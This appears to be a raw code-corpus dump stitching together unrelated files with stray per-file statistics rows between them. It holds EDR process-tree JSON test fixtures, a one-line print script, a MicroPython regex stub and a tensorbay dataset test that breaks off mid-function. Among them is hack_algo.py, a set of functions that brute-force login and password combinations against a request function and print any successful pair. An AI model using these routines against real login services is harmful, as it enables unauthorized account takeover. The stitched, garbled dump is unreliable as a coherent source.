"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 624,
"process_cmdline": [
"C:\\Windows\\system32\\wbem\\WmiApSrv.exe"
],
"process_effective_reputation": "LOCAL_WHITE",
"process_guid": "WNEXFKQ7-00050603-000020f8-00000000-1d6c86e87b1e2be",
"process_hash": [
"55e21dfb7ec2394903e5ca62fdca21e6",
"55c2021f06d28696843672ff90e242c33c4cf6d30cdf0b2d9dcf07d8282cfc19"
],
"process_name": "c:\\windows\\system32\\wbem\\wmiapsrv.exe",
"process_pid": [
8440
],
"process_reputation": "ADAPTIVE_WHITE_LIST",
"process_start_time": "2020-12-02T05:46:50.254Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 1,
"scriptload_count": 0
}
],
"parent": {
"_process_filename": "services.exe",
"backend_timestamp": "2020-12-03T20:34:38.889Z",
"childproc_count": 243,
"crossproc_count": 39,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:32:13.397Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1607027652665,
"modload_count": 53,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-000001fc-00000000-1d6c86e2801246d",
"parent_hash": [
"d5e122606054fa0b03db3ee8cf9ea7701e523875e2bdb87581ad7232ffc9308e",
"e83650f70459a027aa596e1a73c961a1"
],
"parent_name": "c:\\windows\\system32\\wininit.exe",
"parent_pid": 508,
"process_cmdline": [
"C:\\Windows\\system32\\services.exe"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
"process_hash": [
"2bd115a27b60b74bbeb31013519ac199",
"1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a"
],
"process_name": "c:\\windows\\system32\\services.exe",
"process_pid": [
624
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:44:09.808Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 254,
"scriptload_count": 0
},
"children": None
},
"contacted": 34,
"completed": 34
}
GET_TREE_RESP = {
"exception": "",
"summary": {
"process": None,
"siblings": None,
"parent": None,
"children": None
},
"tree": {
"_process_filename": "ngen.exe",
"backend_timestamp": "2020-12-03T19:47:23.199Z",
"childproc_count": 1,
"children": [
{
"_process_filename": "mscorsvw.exe",
"backend_timestamp": "2020-12-03T19:47:23.199Z",
"childproc_count": 0,
"children": [],
"crossproc_count": 3,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T19:44:25.004Z",
"filemod_count": 0,
"has_children": False,
"ingress_time": 1607024805760,
"modload_count": 14,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-000008a0-00000000-1d6c9acb438f08d",
"parent_hash": [
"0eb067650f90e1af3b660c229a58d5e4c505a928847349e06dadb5e88df713f4",
"660254c8228b83705c80374d47f570f1"
],
"parent_name": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\ngen.exe",
"parent_pid": 2208,
"process_cmdline": [
"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe"
" -StartupEvent 1b4 -InterruptEvent 0 -NGENProcess 168 -Pipe 174 -Comment \"NGen Worker Process\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-0000066c-00000000-1d6c9acb43e29bb",
"process_hash": [
"a0b98e5e57de8f666a04ac3eec86d25b",
"60def9905f16bd5d10684afea17ab3a9accdd8ba4a6e06240e84e3acb5f94e3d"
],
"process_name": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorsvw.exe",
"process_pid": [
1644
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-03T19:44:24.953Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 0,
"scriptload_count": 0
}
],
"crossproc_count": 4,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T19:44:25.020Z",
"filemod_count": 5,
"has_children": True,
"hits": False,
"ingress_time": 1607024805760,
"modload_count": 11,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-000023fc-00000000-1d6c9acae2c7003",
"parent_hash": [
"6e4b6d2af6d99dcc1de0e097ea51d43a",
"c4db063d8de31c0a64d172950f857509ee97baa488d8678d48eb6e75b17527b0"
],
"parent_name": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\ngentask.exe",
"parent_pid": 9212,
"process_cmdline": [
"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\" "
"install \"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken="
"b77a5c561934e089\" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-000008a0-00000000-1d6c9acb438f08d",
"process_hash": [
"660254c8228b83705c80374d47f570f1",
"0eb067650f90e1af3b660c229a58d5e4c505a928847349e06dadb5e88df713f4"
],
"process_name": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\ngen.exe",
"process_pid": [
2208
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-03T19:44:24.919Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 0,
"scriptload_count": 0
},
"contacted": 34,
"completed": 34
}
GET_PROCESS_NOT_FOUND = {
"exception": "NOT_FOUND",
"summary": {
"process": None,
"siblings": None,
"parent": None,
"children": None
},
"contacted": 33,
"completed": 33
}
GET_PROCESS_SUMMARY_NOT_FOUND = {
"exception": "NOT_FOUND",
"summary": {
"process": None,
"siblings": None,
"parent": None,
"children": None
},
"contacted": 33,
"completed": 33
}
POST_PROCESS_DETAILS_JOB_RESP = {
'job_id': 'ccc47a52-9a61-4c77-8652-8a03dc187b98'
}
GET_PROCESS_DETAILS_JOB_STATUS_RESP = {
'contacted': 16,
'completed': 16
}
GET_PROCESS_DETAILS_JOB_STATUS_IN_PROGRESS_RESP = {
'contacted': 16,
'completed': 8
}
GET_PROCESS_DETAILS_JOB_RESULTS_RESP = {
'contacted': 16,
'completed': 16,
'num_available': 1,
'num_found': 1,
'results': [
{
"backend_timestamp": "2020-08-28T19:14:40.394Z",
"childproc_count": 333576,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_location": "UNKNOWN",
"device_name": "devr-dev",
"device_os": "LINUX",
"device_os_version": "CentOS 7.6-1810",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_target_priority": "MEDIUM",
"device_timestamp": "2020-08-28T19:12:41.178Z",
"document_guid": "6Gqoe-abQXu-k9LagGOoQg",
"filemod_count": 0,
"ingress_time": 1598642021337,
"modload_count": 0,
"netconn_count": 0,
"org_id": "test",
"parent_effective_reputation": "NOT_LISTED",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"parent_publisher_state": [
"FILE_SIGNATURE_STATE_NOT_SIGNED"
],
"parent_reputation": "NOT_LISTED",
"process_cmdline": [
"/usr/bin/gitea"
],
"process_cmdline_length": [
14
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "80dab519-3b5f-4502-afad-da87cd58a4c3",
"process_hash": [
"285044ad8f8b9322d0cc5e929e2cc18c",
"5975d972eea6b1c53ef9a69452797439ed5bf63fae72e1780761ea1c2cb6976a"
],
"process_name": "/usr/bin/bash",
"process_pid": [
10111,
10222,
10333
],
"process_publisher_state": [
"FILE_SIGNATURE_STATE_NOT_SIGNED"
],
"process_reputation": "NOT_LISTED",
"process_sha256": "5975d972eea6b1c53ef9a69452797439ed5bf63fae72e1780761ea1c2cb6976a",
"process_start_time": "2020-05-04T21:34:03.968Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
}
GET_PROCESS_DETAILS_JOB_RESULTS_RESP_ZERO = {
'contacted': 0,
'completed': 0,
'num_available': 0,
'num_found': 0,
'results': []
}
GET_FACET_SEARCH_RESULTS_RESP = {
"ranges": [
{
"start": "2020-10-20T00:00:00Z",
"end": "2020-11-12T00:00:00Z",
"bucket_size": "+1DAY",
"field": "backend_timestamp",
"values": [
{
"total": 1555,
"name": "2020-10-20T00:00:00Z"
},
{
"total": 1970,
"name": "2020-10-21T00:00:00Z"
},
{
"total": 7727,
"name": "2020-10-22T00:00:00Z"
},
{
"total": 2453,
"name": "2020-10-23T00:00:00Z"
},
{
"total": 37,
"name": "2020-11-11T00:00:00Z"
}
]
}
],
"terms": [
{
"values": [
{
"total": 797,
"id": "2020-10-22T20:56:31.215Z",
"name": "2020-10-22T20:56:31.215Z"
},
{
"total": 708,
"id": "2020-10-19T22:35:43.547Z",
"name": "2020-10-19T22:35:43.547Z"
},
{
"total": 518,
"id": "2020-10-09T14:17:55.189Z",
"name": "2020-10-09T14:17:55.189Z"
},
{
"total": 83,
"id": "2020-11-12T01:40:04.682Z",
"name": "2020-11-12T01:40:04.682Z"
},
{
"total": 26,
"id": "2020-07-30T14:15:50.415Z",
"name": "2020-07-30T14:15:50.415Z"
},
{
"total": 9,
"id": "2020-10-20T18:09:58.469Z",
"name": "2020-10-20T18:09:58.469Z"
},
{
"total": 9,
"id": "2020-10-23T05:48:32.744Z",
"name": "2020-10-23T05:48:32.744Z"
},
{
"total": 8,
"id": "2020-08-24T18:46:30.369Z",
"name": "2020-08-24T18:46:30.369Z"
},
{
"total": 7,
"id": "2020-09-23T15:03:29.263Z",
"name": "2020-09-23T15:03:29.263Z"
}
],
"field": "backend_timestamp"
},
{
"values": [
{
"total": 38,
"id": "2020-10-19T21:25:06.668Z",
"name": "2020-10-19T21:25:06.668Z"
},
{
"total": 13,
"id": "2020-10-22T20:48:22.188Z",
"name": "2020-10-22T20:48:22.188Z"
},
{
"total": 5,
"id": "2020-07-30T14:12:47.986Z",
"name": "2020-07-30T14:12:47.986Z"
},
{
"total": 4,
"id": "2020-11-12T01:38:10.788Z",
"name": "2020-11-12T01:38:10.788Z"
},
{
"total": 2,
"id": "2020-07-30T14:10:41.125Z",
"name": "2020-07-30T14:10:41.125Z"
},
{
"total": 2,
"id": "2020-09-23T15:05:23.758Z",
"name": "2020-09-23T15:05:23.758Z"
},
{
"total": 2,
"id": "2020-10-20T15:53:30.260Z",
"name": "2020-10-20T15:53:30.260Z"
},
{
"total": 1,
"id": "2020-10-23T05:36:34.300Z",
"name": "2020-10-23T05:36:34.300Z"
},
{
"total": 1,
"id": "2020-08-24T17:32:31.211Z",
"name": "2020-08-24T17:32:31.211Z"
}
],
"field": "device_timestamp"
}
],
"num_found": 23753,
"contacted": 36,
"completed": 36
}
EXPECTED_PROCESS_FACETS = {
"backend_timestamp": [
{
"total": 797,
"id": "2020-10-22T20:56:31.215Z",
"name": "2020-10-22T20:56:31.215Z"
},
{
"total": 708,
"id": "2020-10-19T22:35:43.547Z",
"name": "2020-10-19T22:35:43.547Z"
},
{
"total": 518,
"id": "2020-10-09T14:17:55.189Z",
"name": "2020-10-09T14:17:55.189Z"
},
{
"total": 83,
"id": "2020-11-12T01:40:04.682Z",
"name": "2020-11-12T01:40:04.682Z"
},
{
"total": 26,
"id": "2020-07-30T14:15:50.415Z",
"name": "2020-07-30T14:15:50.415Z"
},
{
"total": 9,
"id": "2020-10-20T18:09:58.469Z",
"name": "2020-10-20T18:09:58.469Z"
},
{
"total": 9,
"id": "2020-10-23T05:48:32.744Z",
"name": "2020-10-23T05:48:32.744Z"
},
{
"total": 8,
"id": "2020-08-24T18:46:30.369Z",
"name": "2020-08-24T18:46:30.369Z"
},
{
"total": 7,
"id": "2020-09-23T15:03:29.263Z",
"name": "2020-09-23T15:03:29.263Z"
}
],
"device_timestamp": [
{
"total": 38,
"id": "2020-10-19T21:25:06.668Z",
"name": "2020-10-19T21:25:06.668Z"
},
{
"total": 13,
"id": "2020-10-22T20:48:22.188Z",
"name": "2020-10-22T20:48:22.188Z"
},
{
"total": 5,
"id": "2020-07-30T14:12:47.986Z",
"name": "2020-07-30T14:12:47.986Z"
},
{
"total": 4,
"id": "2020-11-12T01:38:10.788Z",
"name": "2020-11-12T01:38:10.788Z"
},
{
"total": 2,
"id": "2020-07-30T14:10:41.125Z",
"name": "2020-07-30T14:10:41.125Z"
},
{
"total": 2,
"id": "2020-09-23T15:05:23.758Z",
"name": "2020-09-23T15:05:23.758Z"
},
{
"total": 2,
"id": "2020-10-20T15:53:30.260Z",
"name": "2020-10-20T15:53:30.260Z"
},
{
"total": 1,
"id": "2020-10-23T05:36:34.300Z",
"name": "2020-10-23T05:36:34.300Z"
},
{
"total": 1,
"id": "2020-08-24T17:32:31.211Z",
"name": "2020-08-24T17:32:31.211Z"
}
]
}
EXPECTED_PROCESS_RANGES_FACETS = {
"backend_timestamp": [
{
"total": 1555,
"name": "2020-10-20T00:00:00Z"
},
{
"total": 1970,
"name": "2020-10-21T00:00:00Z"
},
{
"total": 7727,
"name": "2020-10-22T00:00:00Z"
},
{
"total": 2453,
"name": "2020-10-23T00:00:00Z"
},
{
"total": 37,
"name": "2020-11-11T00:00:00Z"
}
]
}
GET_FACET_SEARCH_RESULTS_RESP_1 = {
"ranges": [
{
"start": "2020-10-20T00:00:00Z",
"end": "2020-11-12T00:00:00Z",
"bucket_size": "+1DAY",
"field": "backend_timestamp",
"values": [
{
"total": 1555,
"name": "2020-10-20T00:00:00Z"
}
]
}
],
"terms": [
{
"values": [
{
"total": 797,
"id": "2020-10-22T20:56:31.215Z",
"name": "2020-10-22T20:56:31.215Z"
}
],
"field": "backend_timestamp"
}
],
"num_found": 0,
"contacted": 0,
"completed": 0
}
GET_FACET_SEARCH_RESULTS_RESP_NOT_COMPLETE = {
"ranges": [
{
"start": "2020-10-20T00:00:00Z",
"end": "2020-11-12T00:00:00Z",
"bucket_size": "+1DAY",
"field": "backend_timestamp",
"values": [
{
"total": 1555,
"name": "2020-10-20T00:00:00Z"
}
]
}
],
"terms": [
{
"values": [
{
"total": 797,
"id": "2020-10-22T20:56:31.215Z",
"name": "2020-10-22T20:56:31.215Z"
}
],
"field": "backend_timestamp"
}
],
"num_found": 0,
"contacted": 10,
"completed": 2
}
| 37.960432
| 203
| 0.492258
| 8,391
| 105,530
| 5.918246
| 0.076987
| 0.021023
| 0.018365
| 0.027225
| 0.911377
| 0.89563
| 0.884052
| 0.878937
| 0.873137
| 0.866935
| 0
| 0.21909
| 0.382195
| 105,530
| 2,779
| 204
| 37.974091
| 0.542602
| 0.000445
| 0
| 0.826818
| 0
| 0.000365
| 0.474426
| 0.20905
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b1046f709e441a94b7c9159b235130a44f6677f9
| 22
|
py
|
Python
|
d-series/d237.py
|
TheLurkingCat/ZeroJudge
|
6fc49c54a45e2b4b3a8d04b7a5a1fc81a2ff4eee
|
[
"MIT"
] | 1
|
2018-10-21T10:03:42.000Z
|
2018-10-21T10:03:42.000Z
|
d-series/d237.py
|
TheLurkingCat/ZeroJudge
|
6fc49c54a45e2b4b3a8d04b7a5a1fc81a2ff4eee
|
[
"MIT"
] | null | null | null |
d-series/d237.py
|
TheLurkingCat/ZeroJudge
|
6fc49c54a45e2b4b3a8d04b7a5a1fc81a2ff4eee
|
[
"MIT"
] | 2
|
2018-10-12T16:40:11.000Z
|
2021-04-05T12:05:36.000Z
|
print('142913828922')
| 11
| 21
| 0.772727
| 2
| 22
| 8.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.571429
| 0.045455
| 22
| 1
| 22
| 22
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b121f2dbc05329eae13de28e625c838c544c5773
| 3,127
|
py
|
Python
|
components/hack_algo.py
|
Mesteriis/SecTool
|
8bb7f8350dba9b48f3aafb8a58a52ff44a7f8e3b
|
[
"MIT"
] | 1
|
2022-02-07T09:59:40.000Z
|
2022-02-07T09:59:40.000Z
|
components/hack_algo.py
|
Mesteriis/SecTool
|
8bb7f8350dba9b48f3aafb8a58a52ff44a7f8e3b
|
[
"MIT"
] | null | null | null |
components/hack_algo.py
|
Mesteriis/SecTool
|
8bb7f8350dba9b48f3aafb8a58a52ff44a7f8e3b
|
[
"MIT"
] | null | null | null |
def hack_n_password_for_all_logins(login_generator, password_generator, request, limit=1000):
"""
Searching passwords with a limit to all logins from the list
:param login_generator: link to the login generator
:param password_generator: link to password generator
:param request: request function reference
:param limit: search limit
:return: Prints a couple result
"""
login_state = None
while True:
login, login_state = login_generator(login_state)
if login is None:
break
password_state = None
for i in range(limit):
password, password_state = password_generator(password_state)
if password is None:
print("Not found :-(")
break
if request(login, password):
print('SUCCESS', login, password)
break
def hack_n_login_for_all_passwords(login_generator, password_generator, request, limit=100):
"""
Search n users for all passwords
:param login_generator: link to the login generator
:param password_generator: link to password generator
:param request: request function reference
:param limit: search limit
:return: Prints a couple result
"""
password_state = None
while True:
password, password_state = password_generator(password_state)
if password is None:
break
login_state = None
for i in range(limit):
login, login_state = login_generator(login_state)
if login is None:
print ( "Not found :-(" )
break
if request(login, password):
print('SUCCESS', login, password)
break
def hack_login_password_random(login_generator, password_generator, request, limit=10000):
"""
Full random
:param login_generator: login string
:param password_generator: link to password generator
:param request: request function reference
:param limit: search limit
:return: Prints a couple result
"""
login_state = None
password_state = None
for attempt in range(limit):
login, login_state = login_generator(login_state)
password, password_state = password_generator(password_state)
if login is None or password is None:
print ( "Not found :-(" )
break
if request(login, password):
print('SUCCESS', login, password)
def hackKnowUser(login, password_generator, request, limit=10000):
"""
Password selection for a specific user
:param login: login string
:param password_generator: link to password generator
:param request: request function reference
:param limit: search limit
:return: Prints a couple result
"""
password_state = None
for attempt in range(limit):
password, password_state = password_generator(password_state)
if login is None or password is None:
print ( "Not found :-(" )
break
if request(login, password):
print('SUCCESS', login, password)
| 34.744444
| 93
| 0.644707
| 360
| 3,127
| 5.447222
| 0.152778
| 0.138705
| 0.045895
| 0.059153
| 0.854666
| 0.834778
| 0.768995
| 0.755737
| 0.736869
| 0.736869
| 0
| 0.00762
| 0.286537
| 3,127
| 90
| 94
| 34.744444
| 0.871358
| 0.299328
| 0
| 0.92
| 0
| 0
| 0.039005
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0.48
| 0
| 0
| 0.08
| 0.16
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
b13a21d0717a8a363fb866b029b537093c16ab5c
| 2,705
|
py
|
Python
|
docs/code-completion/ure.py
|
yanshanqingyuan/micropython
|
bb57a344967391d22f3430f720bcd0a5882e4a1a
|
[
"MIT"
] | null | null | null |
docs/code-completion/ure.py
|
yanshanqingyuan/micropython
|
bb57a344967391d22f3430f720bcd0a5882e4a1a
|
[
"MIT"
] | null | null | null |
docs/code-completion/ure.py
|
yanshanqingyuan/micropython
|
bb57a344967391d22f3430f720bcd0a5882e4a1a
|
[
"MIT"
] | null | null | null |
"""
ure 模块用于测试字符串的某个模式,执行正则表达式操作。
"""
DEBUG = ... # type: int
class compile(...):
"""
- compile(regex_str[, flags])
编译正则表达式,返回 regex 对象。
"""
...
def __init__(self) -> None:
...
def match(self, string) -> None:
"""用 string 匹配 regex,匹配总是从字符串的开始匹配。"""
...
def search(self, string) -> None:
"""在 string 中搜索 regex。不同于匹配,它搜索第一个匹配位置的正则表达式字符串 (结果可能会是0)。"""
...
def sub(self, replace, string, count, flags) -> None:
"""Compile regex_str and search for it in string, replacing all matches with replace, and returning the new string."""
...
def split(self) -> None:
"""获取缓存区内容。"""
...
class match(...):
"""
- Match objects as returned by match() and search() methods。
"""
...
def __init__(self) -> None:
...
def group(self, index) -> None:
"""用 string 匹配 regex,匹配总是从字符串的开始匹配。"""
...
def groups(self) -> None:
"""在 string 中搜索 regex。不同于匹配,它搜索第一个匹配位置的正则表达式字符串 (结果可能会是0)。"""
...
def start(self, index) -> None:
"""start([index])"""
...
def end(self, index) -> None:
"""end([index])
Return the index in the original string of the start or end of the substring group that was matched. index defaults to the entire group, otherwise it will select a group.
"""
...
def span(self) -> None:
"""Returns the 2-tuple (match.start(index), match.end(index))."""
...
class search(...):
"""
- Match objects as returned by match() and search() methods。
"""
...
def __init__(self) -> None:
...
def group(self, index) -> None:
"""用 string 匹配 regex,匹配总是从字符串的开始匹配。"""
...
def groups(self) -> None:
"""在 string 中搜索 regex。不同于匹配,它搜索第一个匹配位置的正则表达式字符串 (结果可能会是0)。"""
...
def start(self, index) -> None:
"""start([index])"""
...
def end(self, index) -> None:
"""end([index])
Return the index in the original string of the start or end of the substring group that was matched. index defaults to the entire group, otherwise it will select a group.
"""
...
def span(self) -> None:
"""Returns the 2-tuple (match.start(index), match.end(index))."""
...
def match(regex, string) -> None:
"""用 string 匹配 regex,匹配总是从字符串的开始匹配。"""
...
def search(regex, string) -> None:
"""在 string 中搜索 regex。不同于匹配,它搜索第一个匹配位置的正则表达式字符串 (结果可能会是0)。"""
...
def sub(regex_str, replace, string, count, flags) -> None:
"""Compile regex_str and search for it in string, replacing all matches with replace, and returning the new string."""
...
| 25.280374
| 178
| 0.557856
| 314
| 2,705
| 4.754777
| 0.235669
| 0.042867
| 0.052244
| 0.034829
| 0.884126
| 0.87207
| 0.87207
| 0.87207
| 0.87207
| 0.810449
| 0
| 0.003082
| 0.280222
| 2,705
| 106
| 179
| 25.518868
| 0.763739
| 0.003327
| 0
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b13e4b33b657131235546abadb471391e1bff83d
| 29,192
|
py
|
Python
|
tests/test_move_and_copy.py
|
Hoteryoung/tensorbay-python-sdk
|
53c34dd529c20ec69b34ddd348b5c8e74f4094d0
|
[
"MIT"
] | 2
|
2021-08-23T08:30:15.000Z
|
2021-08-30T03:18:41.000Z
|
tests/test_move_and_copy.py
|
yyy624297803/tensorbay-python-sdk
|
58cca7e16264c7ce7e3059a9dd974886b3abd917
|
[
"MIT"
] | null | null | null |
tests/test_move_and_copy.py
|
yyy624297803/tensorbay-python-sdk
|
58cca7e16264c7ce7e3059a9dd974886b3abd917
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
#
# Copyright 2021 Graviti. Licensed under MIT License.
#
import pytest
from tensorbay import GAS
from tensorbay.dataset import Data, Dataset, Frame, FusionDataset, FusionSegment, Segment
from tensorbay.exception import InternalServerError, InvalidParamsError, ResourceNotExistError
from tensorbay.label import Catalog, Label
from tensorbay.sensor import Sensor
from .utility import get_dataset_name
CATALOG = {
"BOX2D": {
"categories": [
{"name": "01"},
{"name": "02"},
{"name": "03"},
{"name": "04"},
{"name": "05"},
{"name": "06"},
{"name": "07"},
{"name": "08"},
{"name": "09"},
{"name": "10"},
{"name": "11"},
{"name": "12"},
{"name": "13"},
{"name": "14"},
{"name": "15"},
],
"attributes": [
{"name": "Vertical angle", "enum": [-90, -60, -30, -15, 0, 15, 30, 60, 90]},
{
"name": "Horizontal angle",
"enum": [-90, -75, -60, -45, -30, -15, 0, 15, 30, 45, 60, 75, 90],
},
{"name": "Serie", "enum": [1, 2]},
{"name": "Number", "type": "integer", "minimum": 0, "maximum": 92},
],
}
}
LABEL = {
"BOX2D": [
{
"category": "01",
"attributes": {"Vertical angle": -90, "Horizontal angle": 60, "Serie": 1, "Number": 5},
"box2d": {"xmin": 639.85, "ymin": 175.24, "xmax": 667.59, "ymax": 200.41},
}
]
}
LIDAR_DATA = {
"name": "Lidar1",
"type": "LIDAR",
"extrinsics": {
"translation": {"x": 1, "y": 2, "z": 3},
"rotation": {"w": 1.0, "x": 2.0, "y": 3.0, "z": 4.0},
},
}
WRONG_LABEL = {
"BOX2D": [
{
"category": "01",
"attributes": {"Vertical angle": -75, "Horizontal angle": 60, "Serie": 1, "Number": 5},
"box2d": {"xmin": 639.85, "ymin": 175.24, "xmax": 667.59, "ymax": 200.41},
}
]
}
class TestMove:
def test_move_segment(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
segment_client = dataset_client.move_segment("Segment1", "Segment2")
assert segment_client.name == "Segment2"
with pytest.raises(InvalidParamsError):
dataset_client.move_segment("Segment1", "Segment3", strategy="push")
segment2 = Segment("Segment2", client=dataset_client)
assert segment2[0].path == "hello0.txt"
assert segment2[0].path == segment[0].target_remote_path
assert segment2[0].label
gas_client.delete_dataset(dataset_name)
def test_move_fusion_segment(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name, is_fusion=True)
dataset = FusionDataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
segment.sensors.add(Sensor.loads(LIDAR_DATA))
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
frame = Frame()
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
frame[LIDAR_DATA["name"]] = data
segment.append(frame)
dataset_client = gas_client.upload_dataset(dataset)
segment_client = dataset_client.move_segment("Segment1", "Segment2")
assert segment_client.name == "Segment2"
with pytest.raises(InvalidParamsError):
dataset_client.move_segment("Segment1", "Segment3", strategy="push")
segment2 = FusionSegment("Segment2", client=dataset_client)
assert segment2[0][LIDAR_DATA["name"]].path == "hello0.txt"
assert (
segment2[0][LIDAR_DATA["name"]].path
== segment[0][LIDAR_DATA["name"]].target_remote_path
)
assert segment2[0][LIDAR_DATA["name"]].label
gas_client.delete_dataset(dataset_name)
def test_move_segment_abort(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment1 = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment1.append(data)
segment2 = dataset.create_segment("Segment2")
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment2.append(data)
dataset_client = gas_client.upload_dataset(dataset)
with pytest.raises(InternalServerError):
dataset_client.move_segment("Segment1", "Segment2")
gas_client.delete_dataset(dataset_name)
def test_move_segment_override(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment1 = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT_1")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
